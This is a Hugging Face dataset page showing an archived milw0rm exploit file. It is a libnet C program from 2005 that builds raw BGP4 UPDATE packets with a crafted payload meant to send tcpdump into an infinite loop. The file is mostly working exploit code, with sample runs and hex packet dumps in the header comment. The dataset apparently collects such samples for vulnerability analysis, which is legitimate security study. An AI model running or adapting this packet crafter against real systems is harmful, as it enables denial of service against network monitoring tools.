Team Ai
Modelpublic

lilbool/vuln-code-analysis

sourceHugging Facemitupdated 2y agoView on Hugging Face
0likes
exploit_1037.txt360 linesDownload Raw Back to exploits
1/*

2* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump infinite

3* loop vulnerability.

4*

5* libnet 1.1

6* Build a BGP4 update message with what you want as payload

7*

8* Copyright (c) 2003 Fr d ric Raynal <pappy at security-labs organization>

9* All rights reserved.

10*

11* Examples:

12*

13* empty BGP UPDATE message:

14*

15* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2

16* libnet 1.1 packet shaping: BGP4 update + payload[raw]

17* Wrote 63 byte TCP packet; check the wire.

18*

19* 13:44:29.216135 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]

20* 16843009:16843032(23) win 32767: BGP (ttl 64, id 242, len 63)

21* 0x0000 4500 003f 00f2 0000 4006 73c2 0101 0101 E..?....@.s.....

22* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........

23* 0x0020 5002 7fff b288 0000 0101 0101 0101 0101 P...............

24* 0x0030 0101 0101 0101 0101 0017 0200 0000 00 ...............

25*

26*

27* BGP UPDATE with Path Attributes and Unfeasible Routes Length

28*

29* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -a `printf "\x01\x02\x03"` -A 3 -W 13

30* libnet 1.1 packet shaping: BGP4 update + payload[raw]

31* Wrote 79 byte TCP packet; check the wire.

32*

33* 13:45:59.579901 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]

34* 16843009:16843048(39) win 32767: BGP (ttl 64, id 242, len 79)

35* 0x0000 4500 004f 00f2 0000 4006 73b2 0101 0101 E..O....@.s.....

36* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........

37* 0x0020 5002 7fff 199b 0000 0101 0101 0101 0101 P...............

38* 0x0030 0101 0101 0101 0101 0027 0200 0d41 4141 .........'...AAA

39* 0x0040 4141 4141 4141 4141 4141 0003 0102 03 AAAAAAAAAA.....

40*

41*

42* BGP UPDATE with Reachability Information

43*

44* # ./bgp4_update -s 1.1.1.1 -d 2.2.2.2 -I 7

45* libnet 1.1 packet shaping: BGP4 update + payload[raw]

46* Wrote 70 byte TCP packet; check the wire.

47*

48* 13:49:02.829225 1.1.1.1.26214 > 2.2.2.2.179: S [tcp sum ok]

49* 16843009:16843039(30) win 32767: BGP (ttl 64, id 242, len 70)

50* 0x0000 4500 0046 00f2 0000 4006 73bb 0101 0101 E..F....@.s.....

51* 0x0010 0202 0202 6666 00b3 0101 0101 0202 0202 ....ff..........

52* 0x0020 5002 7fff e86d 0000 0101 0101 0101 0101 P....m..........

53* 0x0030 0101 0101 0101 0101 001e 0200 0000 0043 ...............C

54* 0x0040 4343 4343 4343 CCCCCC

55*

56*

57* Redistribution and use in source and binary forms, with or without

58* modification, are permitted provided that the following conditions

59* are met:

60* 1. Redistributions of source code must retain the above copyright

61* notice, this list of conditions and the following disclaimer.

62* 2. Redistributions in binary form must reproduce the above copyright

63* notice, this list of conditions and the following disclaimer in the

64* documentation and/or other materials provided with the distribution.

65*

66* THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND

67* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE

68* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE

69* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE

70* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL

71* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS

72* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)

73* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT

74* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY

75* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF

76* SUCH DAMAGE.

77*

78*/

79

80/* #if (HAVE_CONFIG_H) */

81/* #include "../include/config.h" */

82/* #endif */

83/* #include "./libnet_test.h" */

84#include <libnet.h>

85

86void

87usage(char *name);

88

89

90#define set_ptr_and_size(ptr, size, val, flag) \

91if (size && !ptr) \

92{ \

93ptr = (u_char *)malloc(size); \

94if (!ptr) \

95{ \

96printf("memory allocation failed (%u bytes requested)\n", size); \

97goto bad; \

98} \

99memset(ptr, val, size); \

100flag = 1; \

101} \

102\

103if (ptr && !size) \

104{ \

105size = strlen(ptr); \

106}

107

108

109

110int

111main(int argc, char *argv[])

112{

113int c;

114libnet_t *l;

115u_long src_ip, dst_ip, length;

116libnet_ptag_t t = 0;

117char errbuf[LIBNET_ERRBUF_SIZE];

118int pp;

119u_char *payload = NULL;

120u_long payload_s = 0;

121u_char marker[LIBNET_BGP4_MARKER_SIZE];

122

123u_short u_rt_l = 0;

124u_char *withdraw_rt = NULL;

125char flag_w = 0;

126u_short attr_l = 0;

127u_char *attr = NULL;

128char flag_a = 0;

129u_short info_l = 0;

130u_char *info = NULL;

131char flag_i = 0;

132

133printf("libnet 1.1 packet shaping: BGP4 update + payload[raw]\n");

134

135/*

136* Initialize the library. Root priviledges are required.

137*/

138l = libnet_init(

139LIBNET_RAW4, /* injection type */

140NULL, /* network interface */

141errbuf); /* error buffer */

142

143if (l == NULL)

144{

145fprintf(stderr, "libnet_init() failed: %s", errbuf);

146exit(EXIT_FAILURE);

147}

148

149src_ip = 0;

150dst_ip = 0;

151memset(marker, 0x1, LIBNET_BGP4_MARKER_SIZE);

152memset(marker, 0xff, LIBNET_BGP4_MARKER_SIZE);

153

154while ((c = getopt(argc, argv, "d:s:t:m:p:w:W:a:A:i:I:")) != EOF)

155{

156switch (c)

157{

158/*

159* We expect the input to be of the form `ip.ip.ip.ip.port`. We

160* point cp to the last dot of the IP address/port string and

161* then seperate them with a NULL byte. The optarg now points to

162* just the IP address, and cp points to the port.

163*/

164case 'd':

165if ((dst_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)

166{

167fprintf(stderr, "Bad destination IP address: %s\n", optarg);

168exit(EXIT_FAILURE);

169}

170break;

171

172case 's':

173if ((src_ip = libnet_name2addr4(l, optarg, LIBNET_RESOLVE)) == -1)

174{

175fprintf(stderr, "Bad source IP address: %s\n", optarg);

176exit(EXIT_FAILURE);

177}

178break;

179

180case 'p':

181payload = optarg;

182payload_s = strlen(payload);

183break;

184

185case 'w':

186withdraw_rt = optarg;

187break;

188

189case 'W':

190u_rt_l = atoi(optarg);

191break;

192

193case 'a':

194attr = optarg;

195break;

196

197case 'A':

198attr_l = atoi(optarg);

199break;

200

201case 'i':

202info = optarg;

203break;

204

205case 'I':

206info_l = atoi(optarg);

207break;

208

209default:

210exit(EXIT_FAILURE);

211}

212}

213

214if (!src_ip || !dst_ip)

215{

216usage(argv[0]);

217goto bad;

218}

219

220set_ptr_and_size(withdraw_rt, u_rt_l, 0x41, flag_w);

221set_ptr_and_size(attr, attr_l, 0x42, flag_a);

222set_ptr_and_size(info, info_l, 0x43, flag_i);

223

224/*

225* 2005-05-31: Modified by simon@FreeBSD.org to test tcpdump

226* infinite loop vulnerability.

227*/

228if (payload == NULL) {

229if ((payload = malloc(16)) == NULL) {

230fprintf(stderr, "Out of memory\n");

231exit(1);

232}

233pp = 0;

234payload[pp++] = 0;

235payload[pp++] = 33;

236payload_s = pp;

237}

238

239/*

240* BGP4 update messages are "dynamic" are fields have variable size. The only

241* sizes we know are those for the 2 first fields ... so we need to count them

242* plus their value.

243*/

244length = LIBNET_BGP4_UPDATE_H + u_rt_l + attr_l + info_l + payload_s;

245t = libnet_build_bgp4_update(

246u_rt_l, /* Unfeasible Routes Length */

247withdraw_rt, /* Withdrawn Routes */

248attr_l, /* Total Path Attribute Length */

249attr, /* Path Attributes */

250info_l, /* Network Layer Reachability Information length */

251info, /* Network Layer Reachability Information */

252payload, /* payload */

253payload_s, /* payload size */

254l, /* libnet handle */

2550); /* libnet id */

256if (t == -1)

257{

258fprintf(stderr, "Can't build BGP4 update header: %s\n", libnet_geterror(l));

259goto bad;

260}

261

262length+=LIBNET_BGP4_HEADER_H;

263t = libnet_build_bgp4_header(

264marker, /* marker */

265length, /* length */

266LIBNET_BGP4_UPDATE, /* message type */

267NULL, /* payload */

2680, /* payload size */

269l, /* libnet handle */

2700); /* libnet id */

271if (t == -1)

272{

273fprintf(stderr, "Can't build BGP4 header: %s\n", libnet_geterror(l));

274goto bad;

275}

276

277length+=LIBNET_TCP_H;

278t = libnet_build_tcp(

2790x6666, /* source port */

280179, /* destination port */

2810x01010101, /* sequence number */

2820x02020202, /* acknowledgement num */

283TH_SYN, /* control flags */

28432767, /* window size */

2850, /* checksum */

2860, /* urgent pointer */

287length, /* TCP packet size */

288NULL, /* payload */

2890, /* payload size */

290l, /* libnet handle */

2910); /* libnet id */

292if (t == -1)

293{

294fprintf(stderr, "Can't build TCP header: %s\n", libnet_geterror(l));

295goto bad;

296}

297

298length+=LIBNET_IPV4_H;

299t = libnet_build_ipv4(

300length, /* length */

3010, /* TOS */

302242, /* IP ID */

3030, /* IP Frag */

30464, /* TTL */

305IPPROTO_TCP, /* protocol */

3060, /* checksum */

307src_ip, /* source IP */

308dst_ip, /* destination IP */

309NULL, /* payload */

3100, /* payload size */

311l, /* libnet handle */

3120); /* libnet id */

313if (t == -1)

314{

315fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(l));

316goto bad;

317}

318

319/*

320* Write it to the wire.

321*/

322c = libnet_write(l);

323if (c == -1)

324{

325fprintf(stderr, "Write error: %s\n", libnet_geterror(l));

326goto bad;

327}

328else

329{

330fprintf(stderr, "Wrote %d byte TCP packet; check the wire.\n", c);

331}

332

333if (flag_w) free(withdraw_rt);

334if (flag_a) free(attr);

335if (flag_i) free(info);

336

337libnet_destroy(l);

338return (EXIT_SUCCESS);

339bad:

340if (flag_w) free(withdraw_rt);

341if (flag_a) free(attr);

342if (flag_i) free(info);

343

344libnet_destroy(l);

345return (EXIT_FAILURE);

346}

347

348void

349usage(char *name)

350{

351fprintf(stderr,

352"usage: %s -s source_ip -d destination_ip \n"

353" [-m marker] [-p payload] [-S payload size]\n"

354" [-w Withdrawn Routes] [-W Unfeasible Routes Length]\n"

355" [-a Path Attributes] [-A Attribute Length]\n"

356" [-i Reachability Information] [-I Reachability Information length]\n",

357name);

358}

359

360// milw0rm.com [2005-06-09]